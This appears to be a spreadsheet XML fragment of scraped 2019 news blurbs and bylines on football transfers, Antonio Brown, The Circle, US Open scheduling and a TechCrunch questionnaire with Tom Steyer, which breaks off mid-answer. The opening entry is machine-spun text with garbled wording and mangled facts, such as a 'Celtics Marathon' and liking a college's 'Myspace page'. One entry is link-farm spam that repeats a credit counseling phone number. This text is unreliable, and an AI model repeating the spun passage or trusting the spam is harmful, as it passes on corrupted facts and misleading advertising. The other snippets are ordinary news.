activities that would be taken up secure the particular students’ safeness. For many mom and dad who wouldn’t be able to connect with all their students, this specific helped relaxed them until they constructed contact. What should we learn about? This attack will call to mind fear from the hearts of a parent in whose student is actually attending university or college or re-entering college. But additionally should also achieve comfort from your fact that the very colleges inside Boston space had constantly in place a plan in order to communicate with parents and ensure scholar safety. Institutions have crisis communication solutions in place just for tragedies such as the terror strike at the Celtics Marathon. Exactly what should mom and dad do? Mothers and fathers should know just what systems are located in place to speak to them and also notify young people in the event of when you need it. ‘Like’ the actual college’s Myspace page, continue with the colleges regarding Twitter, along with bookmark the college website. When checking out colleges, correctly . about their urgent situation preparations along with precautions, and get about the methods they will value for communicate that will parents and also students.</t>
  </si>
  <si>
    <t>Sam Smith recorded Writing’s On The Wall for the 2015’s Spectre. See full article at Film-news.co.uk » The post Sam Smith backs Dua Lipa and Elton John for Bond theme appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Jockey associations want a period of respect in memory of two riders killed over the past three days, and a thorough investigation into industry fatalities.</t>
  </si>
  <si>
    <t>It’s back – the show where anyone can claim to be anyone as they compete for a grand prize of £100,000. The dystopian catfishing game pulled in 0.62 million viewers during its finale in 2018, and has since been picked up by Netflix. The format has also been sold for a US remake. Channel 4 has announced the release date for the new series of The Circle, which will be hosted by Emma Willis. Here’s everything you need to know about. When does The Circle launch? The new series of The Circle will hit the small screen on Tuesday 24 September at 9.15pm. Read more: The Circle is everything that’s wrong with the modern world – and I love it The 75-minute season premiere will be broadcast live on Channel 4. It will then be on every night at 10pm until the game comes to an end. There will also be a live show on Friday that is 90 minutes long. Who will appear on the show? The first contestants of this year’s series are yet to be revealed. As in the show last year, players will join The Circle as via the social media platform as the show progresses. How does the show work? During the show, “players” move to a refurbished block of flats in London where they live for the duration of the series. Each of the contestants lives by themselves, and can communicate with each other via their social media profiles on platform The Circle. This allows them to portray themselves as anyone, or in anyway, they want to. Most of the players in the 2018 series decided to be honest with the other contestants, although some of them did catfish the others by altering their ages, what they did for a living, or even pretending to be an entirely fabricated character. ALERT! We have an official start date @EmmaWillis @Channel4 #TheCircle pic.twitter.com/yERDNNlspc — The Circle (@C4TheCircle) September 11, 2019 The players are then asked to rank each other out of five, before their cumulative scores are listed as averages from highest to lowest. The top two players become “influencers” while the others face the prospect of being “blocked” and eliminated from the competition. The final showdown sees contestants rank each other one last time, and the highest ranked player wins. The viewers at home are also asked to select their winner. Who won the last series of The Circle? The first series was won by Alex Hobern, a 26-year-old internet comedian, who joined The Circle claiming to be a 25-year-old woman called Kate. He used pictures of his actual girlfriend, Millie, to deceive the other players. Good job Alex didn’t go in there with a knock knock joke. #TheCircleFinal pic.twitter.com/H8s5n9MSp5 — The Circle (@C4TheCircle) October 8, 2018 Who will host the show? Former Big Brother presenter Emma Willis will take over from Maya Jama and Alice Levine to host the second series, which will run for an extended period and feature a live show on Fridays. The live broadcasts will give viewers at home a chance to twist the plot and change the narrative direction of the game. Presenter Emma Willis during the Celebrity Big Brother final 2018 at Elstree Studios on September 10, 2018 in Borehamwood, England. (Photo by Stuart C. Wilson/Getty Images) “I’m an avid people watcher and fascinated by the positives and negatives of social media,” Willis said in a statement on her new role. “I got hooked on the first series and thought it was a smart format that highlights how we shouldn’t take everything on social media at face value. “I’m delighted to be part of something that is incredibly relevant and can’t wait to join the team and see how mischievous people are prepared to be for £100,000.” More on TV What you need to know about Sinead Tinker leaving Coronation Street Mark Wright's emotional family discovery on Who Do You Think You Are? Everything you need to know about the new series of Taskmaster Here is where the new ITV drama Deep Water is filmed Everything you need to know about ITV's new drama Deep Water Here's every star that has won Celebrity MasterChef over the years The post When is The Circle 2019 on Channel 4? Start date, how it works and everything else about the second series appeared first on inews.co.uk. The post When is The Circle 2019 on Channel 4? Start date, how it works and everything else about the second series appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>PERCHED at the top of Gregory Street in one of Townsville’s most sought after locations, this house has been meticulously maintained, boasting high end finishes and character features.</t>
  </si>
  <si>
    <t>SEISMOLOGISTS could be able to predict when the Big One is about to strike after discovering a series of mini tremors occur in the build-up to a major earthquakes. The post California earthquake alert: Big One fears as scientists hope to predict next major quake appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Source: https://www.digitaltrends.com/gaming/apex-legends-character-from-titanfall/ Rumored Apex Legends character may be a familiar face to Titanfall players Reliable dataminer That1MiningGuy discovered code on a rumored future Apex Legends character, who will be a familiar face for Titanfall players. Source: https://www.digitaltrends.com/gaming/apex-legends-character-from-titanfall/ The post Rumored Apex Legends character may be a familiar face to Titanfall players appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>A quick video of tips and just giving you the basics of what will help you during the festival, Check out my band and other videos on my channel https://www.facebook.com/secondselfuk/ The post Download Festival tips and what to bring 2019 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Antonio Brown’s long strange trip in Oakland is now over. The Raiders released Brown on Saturday, ending the latest chapter in a truly bizarre tenure with the team that signed him to a $64 million contract in the off-season. Brown was released just two days before the Raiders were set to open the season in Denver against the Broncos. The announcement came mere hours after Brown posted a message on his Instagram account on Saturday morning saying he was misunderstood and unappreciated, and wanted to move on. “Release me @Raiders #NOMore,” he wrote. The Raiders granted his wish after weeks of turmoil, including a dispute over which helmet Brown would wear and a video posted to YouTube with audio from a phone conversation between Brown and Coach Jon Gruden. The move ends a saga between the team and its prized receiver that also saw Brown miss practice time due to blistered feet reportedly suffered in a cryogenic chamber. The team had reportedly fined Brown over $215,000 for conduct detrimental to the team and voided $30 million guaranteed salary in his contract, which prompted the Instagram post. He immediately becomes an unrestricted free agent. “Now that Antonio is a free agent, we are focused on the future and I will immediately work on signing him to a new team. Antonio is looking forward to a new beginning,” Drew Rosenhaus said to ESPN. This is a breaking story and will be updated. Source link</t>
  </si>
  <si>
    <t>Allison Jess</t>
  </si>
  <si>
    <t>Eighteen months after being diagnosed with breast cancer, Regan Lions is fundraising as a way of saying thanks to the centre where she had some of her treatment.</t>
  </si>
  <si>
    <t>David Lao</t>
  </si>
  <si>
    <t>The plan aims to create new taxes on the wealthy and provide tax breaks to the middle class, however it would still have the Liberals face another four years of deficit.</t>
  </si>
  <si>
    <t>Prof Karim Brohi describes holding a stabbed man's heart in his hands amid rising knife crime in the capital. The post A week in the life of a London trauma surgeon appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Brett Worthington</t>
  </si>
  <si>
    <t>Scott Morrison says "smears" on the Liberal backbencher carry a "grubby undertone" and questions about her fitness to sit in the Parliament are "an insult to every single Chinese-Australian in this country".</t>
  </si>
  <si>
    <t>Premier transfer rumours: Man United eye shock move, Man City star wanted Original Source Premier League clubs are now unable to bring in any players until January, but that doesn’t stop teams planning moves for players ahead of the winter transfer window. The window for European and League One and League Two clubs is also open until September 2nd, so players can still leave the Prem until Monday evening. So, here are all the latest Premier League rumours. Goalkeepers on Man Utd’s radar Manchester United could be looking to sell David de Gea in January as their scouts are scouring Europe for a new keeper, the Sun are reporting. De Gea has still not signed United’s offer of a new deal, worth around £350,000-a-week, despite months of talks. Jan Oblak has been a long-term target for the Red Devils, and they also have Sergio Romero and Dean Henderson – who is currently impressing on loan at Sheffield United. Read More Rangers and Roma target Foden loan According to the Mirror, Manchester City midfielder Phil Foden has been the subject of two loan bids from Rangers and Roma – but both have been rejected. Pep Guardiola has been extremely complimentary of the youngster, but he has failed to get regular first-team minutes, with the likes of David Silva, Kevin De Bruyne and Bernardo Silva. But Foden is clearly wanted as a squad player, with City eyeing another domestic treble Roma have clearly had scouts in Manchester recently, after Chris Smalling joined the club on loan from Manchester United. Hernandez hands in transfer request The Mail are reporting that Javier Hernandez has handed in a transfer request at West Ham as he closes in a move to Sevilla. The Hammers signed two strikers in the summer transfer window, with Sebastian Haller and Albian Ajeti both signing from Frankfurt and Basel, respectively. The Mexican has made two appearances under Manuel Pellegrini this season, scoring one goal. Read More Duncan eyed by Dortmund Borussia Dortmund will be in the running to sign Bobby Duncan, should Liverpool decide to end his contract with the club, according to the Mirror. Duncan agent released a statement last week, claiming that the player was frustrated that he wasn’t allowed to leave the club, with both Fiorentina and FC Nordsjaelland both interested in the player. The 18-year-old would be the second young English winger to join Dortmund, after Jadon Sancho’s move from Manchester City two years ago, and that didn’t work out too badly…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Premier transfer rumours: Man United eye shock move, Man City star wanted appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Help needed to install plywood flooring in ground floor. room Job involves carrying the sheets in from the outside, and placing where needed, so you need to be able to easily lift a sheet of plywood. You may also be asked to screw them in place. I have handles for carrying sheets to make the .. Read more</t>
  </si>
  <si>
    <t>Last month we gave our readers a chance to cast their vote to help us narrow down our extensive longlists of the best B2B tech and accessories for the TechRadar Pro Best for Business Awards 2019, in partnership with Avast Business. The votes have now been counted, and here are the top picks for the best marketing and cloud storage solutions in 2019. These are the best business accessories of 2019 Best Cloud Storage for Business: Google Drive Google Drive has come a long way since it first launched back in 2012 at a time when many businesses were first beginning their cloud migrations. Google’s cloud storage solution is part of G Suite alongside Google Docs, Sheets, Slides and its other productivity and business software. With Google Drive for G Suite, every user at your organization gets 30GB of cloud storage space on the basic plan but this gets bumped up to unlimited storage with the company’s Business and Enterprise plans as long as you have five or more users. Read the full review Best Web Hosting for Business: GoDaddy Business Hosting US web hosting giant GoDaddy is this year’s pick for the best web hosting for business. With its business hosting plans you get the power of a Virtual Private Server with an easy-to-use cPanel control panel to manage your website. Unlike with GoDaddy’s shared hosting plans, you don’t have to share resources such as CPU and RAM with others. You can also host an unlimited number of websites with GoDaddy Business Hosting and the company even includes a free subscription to Microsoft Office 365 Business Email for the first year with each of its business plans. Also check out the best web hosting services of 2019 Best Website Builder for Business: GoDaddy Website Builder Building a website from scratch can be a difficult undertaking which is why many organizations choose to use a website builder instead. This year’s pick for the best website builder for business is GoDaddy Website Builder because of its ease of use and GoDaddy itself even claims that it enables anyone to “build a better website in under an hour”. This website builder provides users with a simple editor which allows them to create responsive websites using pre-built content blocks. An integrated Getty image library helps you find pictures for your site in just a few clicks and the service even allows you to design sites on anything from your desktop to your phone. Read the full review Best Email Marketing Solution: Mailchimp Mailchimp is a dedicated email marketing platform that allows users to send notifications, updates, offers and other direct marketing to opted in subscribers. However, the service also includes built-in analytics so you can gauge the performance of these email campaigns. Mailchimp is available at three different tiers though the company also offers a Free plan that allows you to send up to 12,000 emails per month to up to 2,000 subscribers on your list. Mailchimp also recently announced that it will soon expand beyond email to offer a full marketing platform for SMBs. These are the best online marketing services of 2019 Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: TechRadar Pro Best for Business Awards 2019: Best marketing and cloud storage solution</t>
  </si>
  <si>
    <t>ARTHUR ASHE STADIUM — 12:00 PM start Following 1 ATP match [8] Serena WILLIAMS (USA) vs. [22] Petra MARTIC (CRO) ARTHUR ASHE STADIUM — 7:00 PM start [5] Elina SVITOLINA (UKR) vs. [10] Madison KEYS (USA) LOUIS ARMSTRONG STADIUM — 11:00 AM start [18] WANG Qiang (CHN) vs. [2] Ashleigh BARTY (AUS) [16] Johanna KONTA (GBR) vs. [3] Karolina PLISKOVA (CZE) [9] Nicole MELICHAR (USA) / Kveta PESCHKE (CZE) vs. [WC] Coco GAUFF (USA) / Catherine MCNALLY (USA) GRANDSTAND — 11:00 AM start Alexa GUARACHI (CHI) / Bernarda PERA (USA) vs. Caroline DOLEHIDE (USA) / Vania KING (USA) Following 1 ATP match Anna KALINSKAYA (RUS) / Yulia PUTINTSEVA (KAZ) vs. PENG Shuai (CHN) / Alicja ROSOLSKA (POL) COURT 5 — Not before 1:00 PM [7] CHAN Hao-Ching (TPE) / Latisha CHAN (TPE) vs. Anastasia PAVLYUCHENKOVA (RUS) / Anastasija SEVASTOVA (LAT) [3] Gabriela DABROWSKI (CAN) / XU Yifan (CHN) vs. Anna-Lena FRIEDSAM (GER) / Laura SIEGEMUND (GER) Following 1 ATP match [WC] Hayley CARTER (USA) / Jackson WITHROW (USA) vs. [2] Gabriela DABROWSKI (CAN) / Mate PAVIC (CRO) COURT 7 — 11:00 AM start [14] Lyudmyla KICHENOK (UKR) / Jelena OSTAPENKO (LAT) vs. Raluca OLARU (ROU) / YANG Zhaoxuan (CHN) Following 2 ATP matches [4] Latisha CHAN (TPE) / Ivan DODIG (CRO) vs. Raluca OLARU (ROU) / Franko SKUGOR (CRO) Abigail SPEARS (USA) / Rohan BOPANNA (IND) vs. Raquel ATAWO (USA) / Fabrice MARTIN (FRA) COURT 11 — Not before 1:00 PM [6] Demi SCHUURS (NED) / Henri KONTINEN (FIN) vs. [WC] Jennifer BRADY (USA) / Denis KUDLA (USA) Viktoria KUZMOVA (SVK) / Aliaksandra SASNOVICH (BLR) vs. Danielle COLLINS (USA) / Ellen PEREZ (AUS) COURT 17 — Not before 1:00 PM Viktorija GOLUBIC (SUI) / Sara SORRIBES TORMO (ESP) vs. [4] Elise MERTENS (BEL) / Aryna SABALENKA (BLR) Following 2 ATP matches [5] Nicole MELICHAR (USA) / Bruno SOARES (BRA) vs. [WC] Bethanie MATTEK-SANDS (USA) / Jamie MURRAY (GBR) The post US Open 2019: Day 7 Order of Play appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>James Glenday</t>
  </si>
  <si>
    <t>These appearances seemed an attempt by both leaders to show their worth to Mr Trump but getting close to this President comes with some risk, writes James Glenday.</t>
  </si>
  <si>
    <t>The woman, who is known as "Blue Girl" after the colours of Esteghlal FC, shouted anti-regime slogans while dousing herself with petrol, witnesses told local press.</t>
  </si>
  <si>
    <t>City’s FIFA 20 ratings confirmed Original Source The moment has come. Leroy Sané, Aymeric Laporte and Oleksandr Zinchenko compete in the EA SPORTS FIFA Ratings challenge to try an earn themselves a FIFA 20 upgrade. See how they got on here… .@LeroySane19, Zinchenko and @Laporte going for the #FIFARatings upgrades with @TheF2! https://t.co/LaA1FnsklZ @EASPORTSFIFA #FIFA20 #mancity pic.twitter.com/rTzh0Wk2sR — Manchester City (@ManCity) September 9, 2019 Find out which City players made the top 100 players in FIFA 20. Agree? Let the #FIFARatings debate begin… FIFA 20 TOP 100 REVEALED… Pre-order the FIFA 20 Champions Edition now and start playing on September 24th, three days before the full release! ORDER FIFA 20…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City’s FIFA 20 ratings confirmed appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Ukrainian Arabic Dictionary – travel dictionary to translate Ukrainian to Arabic. Click on the list to show Ukrainian or Arabic synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Ukrainian Arabic Dictionary →</t>
  </si>
  <si>
    <t>Aussie skipper Tim Paine has revealed the injury fallout from the fifth and final Test of the Ashes series.</t>
  </si>
  <si>
    <t>Tyler Sullivan</t>
  </si>
  <si>
    <t>Antonio Brown’s time with the Patriots lasted just 11 days. The team elected to release the receiver on Friday in the midst of an NFL investigation revolving around sexual assault allegations along with Brown allegedly intimidating a second accuser. In a statement, the Patriots said, in part, “We appreciate the hard work of many people over the past 11 days, but we feel that it is best to move in a different direction at this time.” So, with Brown’s time in Foxborough kaput, now what? New England is left with Julian Edelman, Josh Gordon, Phillip Dorsett, Jakobi Meyers and Gunner Olszewski on the active roster at receiver. Special teams ace Matthew Slater can also play the position as well. The Pick Six Podcast fired up an emergency episode to react to the news and what it means for Brown</t>
  </si>
  <si>
    <t>CBS Sports Staff</t>
  </si>
  <si>
    <t>No. 16 Oregon will be out to snap a three-game losing streak to Stanford when they meet in a key early-season Pac-12 North college football showdown. The Ducks (2-1) have put together two straight winning seasons and 13 of the past 14, while the Cardinal (1-2), who have had 10 consecutive winning years, are out to snap a two-game losing streak. Saturday’s game is scheduled for 7 p.m. ET from Stanford Stadium. Stanford is 0-1 in conference play, while the Ducks are playing their first Pac-12 contest of the season. The Ducks are favored by 10.5 points in the latest Oregon vs. Stanford odds, while the over-under for total points scored is 55.5. You’ll want to see the college football predictions from the SportsLine Projection Model before laying any Oregon vs. Stanford picks down. The SportsLine Projection Model simulates every</t>
  </si>
  <si>
    <t>Former investment banker Andrew Ross says he's close to realising a long-held dream for suburban surf communities.</t>
  </si>
  <si>
    <t>NBA star Kawhi Leonard’s sister charged in deadly robbery Original Source RIVERSIDE, Calif. (AP) — A relative of NBA star Kawhi Leonard has confirmed his sister is one of two women accused of robbing and killing an elderly woman at a Southern California casino. The Riverside Press-Enterprise reports the aunt of 35-year-old Kimesha Williams confirmed Saturday that Williams is the sister of the Los Angeles Clippers forward. Authorities say Williams and an accomplice followed an 84-year-old woman into a bathroom at Pechanga Resort Casino on Aug. 31, broke her skull and stole her purse. The victim died Wednesday. A Riverside County sheriff’s investigator is asking a judge to keep Williams held without bail, saying she may flee and “has family that are well-off and could post her bail.” Leonard attended high school in the area. He led the Toronto Raptors to their first NBA championship during the 2018-19 season before signing with the Clippers.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NBA star Kawhi Leonard’s sister charged in deadly robbery appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/space-photos-of-the-week-spying-on-jupiter Space Photos of the Week: Spying on Jupiter The spacecraft Juno made it through a very hostile environment to send back images of this enormous, telegenic, enshrouded planet. Source: https://www.wired.com/story/space-photos-of-the-week-spying-on-jupiter The post Space Photos of the Week: Spying on Jupiter appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Georgina Robinson</t>
  </si>
  <si>
    <t>Samurai slashings and the tireless work of an English historian have uncovered the real story behind rugby's origins in Japan.</t>
  </si>
  <si>
    <t>According to reports in Spain, Newcastle will have the chance to sign January target Rony Lopes when the transfer window reopens this winter. Both the Chronicle and the Northern Echo credited us with serious interest in the Portuguese winger over the past few weeks, and GOL Digital now report that he’ll be free to leave the La Liga club in the new year. This comes as a slight surprise given he only completed a £18m move from Monaco to Sevilla this summer, however he’s struggled to break into Julen Lopetegui’s side and will be allowed to leave in January as a result according to new reports in Spain today. The 23-year-old has only appeared twice for Sevilla so far this season, failing to start a single game and featuring for a grand total of 43 minutes via late cameos from the bench. That said, the versatile attacker – who was previously on Man City’s books as a youngster – is a Portuguese international who burst onto the scene the season before last after bagging 17 goals and 12 assists for Monaco during their 2017/18 campaign. Time will tell if these new claims from Spain prove to be correct, but his game time so far does suggest Sevilla are having second thoughts and may be happy to cash in this winter if they get their £18m back. (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</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</si>
  <si>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Manhattan, New York Consumer Credit Counseling Service | (888) 551-1270 by USA Consumer Credit Counseling, Felipe Escobar on Monday 23 September 2019 04:55 AM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Manhattan, New York Consumer Credit Counseling Service | (888) 551-1270 Monday 23 September 2019 04:10 AM UTC-05 | Tags: manhattan new-york-consumer-credit-counseling-service-888-551-1270 https://youtu.be/fqOVsGmZl2w Manhattan, New York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Manhattan, New York credit counseling services provide resources to help solve your money problems. Counselors discuss your entire financial situation and help you develop a personalized plan. They can assist you with starting a budget. And they can help you find educational programs on money management. Debt Collection A debt collector generally is a person or company that regularly collects debts owed to others, usually when those debts are past-due. This includes collection agencies, lawyers who collect debts as part of their business, and companies that buy delinquent debts and then try to collect them. The Fair Debt Collection Practices Act (FDCPA) prohibits debt collectors from using abusive, unfair, or deceptive practices to collect from you. The Servicemembers Civil Relief Act (SCRA) assists active-duty military with financial burdens. Under this act, you may qualify for a reduced interest rate on mortgages and credit card debts. It can offer protection from eviction. It can also delay civil court including bankruptcy, foreclosure, or divorce proceedings. To find out if you qualify, contact Manhattan, New York Consumer Credit Counseling Service (888) 551-1270. While there is no universal program to help with personal debt, there are a number of local programs to help people in financial hardships. One of the main sources of financial hardship is due to illness and medical bills. Not only do people lose income, but medical debt can be very expensive. Left with no recourse, many people use up their savings and even run up credit card debt to pay medical bills and get medical care. Contact Manhattan, New York Consumer Credit Counseling Service at (888) 551-1270 to learn about the many government sponsored programs available to help you get out of debt. http://www.tunesbaby.com/yt/?x=fqOVsGmZl2w http://www.infinitelooper.com/?v=fqOVsGmZl2w https://consumercreditcounselingserviceusa.blogspot.com/p/st-thomas-us-virgin-islands-consumer.html http://creditcounselingconsumer.home.blog/tallahassee-florida-consumer-credit-counseling-service-888-551-1270-2/ http://californiacreditcounseling.video.blog/brownsville-texas-consumer-credit-counseling-service-888-551-1270/ http://districtofcolumbiacreditcounseling.home.blog/north-dakota-consumer-credit-counseling-service-888-551-1270/ via Manhattan, New York Consumer Credit Counseling Service | (888) 551-1270 September 23, 2019 at 03:59AM Copyright © September 23, 2019 at 03:59AM Tags: manhattan new-york-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>A car was found crashed into a storm water drain near the rear of the Cannon Park racecourse. Closer inspection revealed the body of a 61 year old man in the car.</t>
  </si>
  <si>
    <t>Peter Wells</t>
  </si>
  <si>
    <t>"It’s important we stand for free and open access - not walled gardens", says CEO Owen Grover.</t>
  </si>
  <si>
    <t>Neil Harrison</t>
  </si>
  <si>
    <t>Isaac Hayden had another excellent performance in the midfield for Newcastle United yesterday. What a battler Isaac is in the center of the pitch. He has become one of the core members […] This post written by Neil Harrison originally appeared on The Newcastle United Blog. Read the full post here. Source</t>
  </si>
  <si>
    <t>JAX Tyres</t>
  </si>
  <si>
    <t>At JAX Tyres from 16/9/19 to 30/9/19 purchase any Pirelli product online for an extra 5% discount. This is in addition to the Dragon Sport cashback promotion. The Pirelli range can be viewed here https://www.jaxtyres.com.au/tyres/pirelli With the promotion landing pages details found here https://www.jaxtyres.com.au/promotions/pirelli-50-dollar-cas...</t>
  </si>
  <si>
    <t>All the scares you could ask for! See full article at Cinemablend.com » The post All The Horror Movies You Can See In Theaters After IT Chapter Two This Fall appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Co-writer also praised how The Last Jedi director Rian Johnson laid the groundwork for the film See full article at Independent.co.uk » The post Star Wars: The Rise of Skywalker will explore the ‘complicated relationship’ between Rey and Kylo Ren appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>The Labour Party’s ruling body is to consider abolishing the post of deputy leader. Read more? Click here</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190902/p2#a190902p2 A closer look at software architecture lock-in, which many developers consider their archenemy, in its many forms like vendor lock-in, product lock-in, and more (Gregor Hohpe/Martin Fowler) Gregor Hohpe / Martin Fowler: A closer look at software architecture lock-in, which many developers consider their archenemy, in its many forms like vendor lock-in, product lock-in, and more — A significant share of architectural energy is spent on reducing or avoiding lock-in. That’s a rather noble objective … Source: http://www.techmeme.com/190902/p2#a190902p2 The post A closer look at software architecture lock-in, which many developers consider their archenemy, in its many forms like vendor lock-in, product lock-in, and more (Gregor Hohpe/Martin Fowler) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Roger Ver aka Bitcoin Jesus was in the news recently after he left his position as CEO of Bitcoin.com and appointed Stefan Rust, who was formerly the Global Head of Corporate and Business Development at the company. Bitcoin.com has also witnessed an array of developments of late, starting from the launch of its native cryptocurrency exchange to its recent partnership with HTC to add BCH support on HTC’s blockchain smartphone. Newly-appointed CEO Stefan Rust addressed this partnership in a recent Ask Me Anything [AMA] session. Rust asserted that the collaboration has given the opportunity of having a bank on the HTC Exodus 1 smartphone. The blockchain smartphone will be pre-equipped with a wallet application and will be the first smartphone to support BCH. Rust added that the HTC partnership would stimulate the growth of BCH as a payment medium. Several crypto-analysts have been vouching for a surge in the price of Bitcoin towards the end of this year. However, Rust believes that by 2020, there would be an increase in the adoption of other cryptocurrencies. He also asserted that more value would emerge from altcoins and not Bitcoin. He said, “The main reason is if you are transacting building commercial services on chain, you are actually driving more value for the chain and ultimately building utility for that service, which people want to transact around in a trustless, borderless environment.” Rust further highlighted the fact that altcoins are particularly attractive as they can be used across several fields. Bitcoin.com’s David Shin had a while back said that the company is focusing on accelerating the market cap of BCH, while also revealing that the company is planning to launch a futures contract for the coin. Rust reiterated the same in his AMA, stating that the goals of the company revolve around pushing BCH into the top three of the world’s largest cryptocurrencies by market cap by next year. Further, Rust spoke about the potential ban on cryptocurrencies by the United States. According to Rust, the United States would be at a “detriment,” if it banned crypto. He went on to highlight how innovation is paving the way to the creation of jobs, which is one of the most important necessities of any economy.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/20/ten-questions-for-2020-presidential-candidate-tom-steyer/ Ten questions for 2020 presidential candidate Tom Steyer In November 2020, America will go to the polls to vote in perhaps the most consequential election in a generation. The winner will lead the country amid great social, economic and ecological unrest. The 2020 election will be a referendum on both the current White House and the direction of the country at large. Nearly 20 years into the young century, technology has become a pervasive element in all of our lives, and will continue to only grow more important. Whoever takes the oath of office in January 2021 will have to answer some difficult questions, ranging from an impending climate disaster to concerns about job loss at the hands of robotics and automation. Many of these questions are overlooked in day to day coverage of candidates and during debates. To better address the issues, TechCrunch staff has compiled a 10-part questionnaire across a wide range of tech-centric topics. The questions have been sent to national candidates, regardless of party. We will be publishing the answers as we receive them. Candidates are not required to answer all 10 in order for us to publish, but we will be noting which answers have been left blank. Previously: John Delaney This time out, we’re speaking to Tom Steyer. The California-based billionaire hedge fund manager spent time at Morgan Stanley and Goldman Sachs before founding and heading up Farallon Capital Management. The investment firm managed $21 billion in investments with Steyer at the helm. In recent years, he has become an outspoken opponent of climate change, giving a speech at the 2012 Democratic National Convention. In 2017, he rose to national political prominence starring in a self-funded $10 million TV ad campaign calling for the Donald Trump’s impeachment. 1. Which initiatives will you prioritize to limit humankind’s impact on climate and avoid potential climate catastrophe? Climate change is a crisis as big and urgent as any other that this country and our planet has faced. It demands our immediate attention on all levels of government and society. Our country needs a strong president who will make this a top priority. On my first day in office, I will declare the climate crisis a national emergency and use the emergency powers of the presidency to implement a plan to build a safer, more sustainable world, with or without Congress. This is truly a global crisis, and it is long past time for the United States to take the lead in solving it. I have been on the ground working with local groups to take on polluters and save the planet. One campaign I successfully led was the No on Prop 23: a coalition that defeated a ballot initiative sponsored by out of state oil interests that would have rolled back California’s nation-leading climate laws. 2. What is your plan to increase black and Latinx startup founders’ access to funding? Finance and banking were built around a pretty basic idea — some people have money, while others need it to buy homes, build a business and improve their lives. Moving that money around efficiently was the key to success. The free flow of capital fuels the private sector. But not everyone has equal access to that capital, particularly for the innovative new products that could redefine society. In particular, we know that women, black and Latinx founders have been held back by racists and misogynists and do not have the same access to funding that their white, male counterparts enjoy. So here’s what I have done: my wife and I created Beneficial State Bank as an alternative to the big financial institutions that have treated customers, communities and the planet so badly and that have left so many Americans out of shared prosperity. The profits from the bank don’t go to line our pockets, but are reinvested into the community and used to promote the public good. We now have 17 local branches throughout California, Oregon and Washington, which have been used to build affordable homes for low-income families; create clean, renewable energy; provide spaces for art; educate our youth; help nonprofit organizations and support minority businesses and businesses owned by workers. As president, I will apply this approach to government programs supporting entrepreneurship to ensure that the best ideas have the chance to succeed, no matter the sex, race or creed of the founder. I will also restore the integrity of the Consumer Financial Protection Bureau to ensure that financial institutions and others are putting the interests of consumers and borrowers first. 3. Why do you think low-income students are underrepresented in STEM fields and how do you think the government can help fix that problem? Science, technology, engineering and math — and I would add the arts, STEAM — are the fields at the core of our innovation economy. Yet so far, low-income students have been left out. We have to tackle this from cradle to career, but there are a few simple things we can do to get started. Our campaign has proposed The 5 Rights, and one of these is the right to education. This includes a strong math foundation, a fundamental need for kids wanting to progress in STEM/STEAM fields. It also includes resourcing schools in all ZIP codes to offer hands-on learning, like place-based environmental education, and to teach new life skills like coding. For kids who are already starting out behind, we are going to have to devote the necessary resources to get them up to speed. Once they graduate, we also want the door to college to be open for any student who dreams of building a better future for themselves. That’s why I have been working to reduce student debt, ensure that kids are properly nourished at school and have other social services available to them, making it possible for students from all family backgrounds to afford quality higher education. 4. Do you plan on backing and rolling out paper-only ballots or paper-verified election machines? With many stakeholders in the private sector and the government, how do you aim to coordinate and achieve that? One person, one vote is the principle underpinning our system of government. As we have seen, the very machines where we cast our votes are under attack, and states need help to secure the integrity of our elections. My administration will work closely with all 50 states to implement paper ballots and risk-based auditing to secure our election systems from fraud and malicious attack. 5. What, if any, federal regulation should be enacted for autonomous vehicles? My hometown is where these cars are first hitting the roads and from that experience, we know that autonomous vehicles are well on their way, but aren’t quite ready for mainstream. As this new technology develops, we will need to update our federal regulations to ensure the safety of the American people. 6. How do you plan to achieve and maintain U.S. superiority in space, both in government programs and private industry? Space has captured our imaginations as the next frontier, a place of striving, exploration and excellence, and is also the sphere where the infrastructure of our future is being built in the satellites that now connect people around the planet almost seamlessly. Space, like any domain in which we compete with adversaries and collaborate with allies, demands our attention and a commitment to research and development so we stay a step ahead. Our security interests are always a top priority — but the best way to ensure our safety is to make sure the American people are writing the rules for the defense industry, not lobbyists and corporate interests. I’d ensure that the U.S. Air Force is equipped to handle the risks while making sure every branch and entity involved in space has a centralized hub for communication and action. And we should continue to look at American-led international cooperation — including public and private sector collaboration — in space as a perfect example of soft power, which we should work to maintain and expand. Finally, we should ensure that America’s space program, NASA, is properly resourced. 7. Increased capital in startups founded by American entrepreneurs is a net positive, but should the U.S. allow its businesses to be part-owned by foreign governments, particularly the government of Saudi Arabia? As president, I will commit to protecting and fostering American interests, both at home and abroad. And that is why I will support investments in our businesses from sources outside of the U.S. as long as the ownership does not risk our national security and those countries — and companies from those countries — obey and respect our laws from intellectual property to labor and environmental standards. We can only advance our interests if our values are respected. 8. Will U.S.-China technology decoupling harm or benefit U.S. innovation and why? Like it or not, we are going to have to engage with China both economically and politically. It’s impossible for us to completely divorce these relationships. The real challenge facing our country is how we promote and protect American economic and 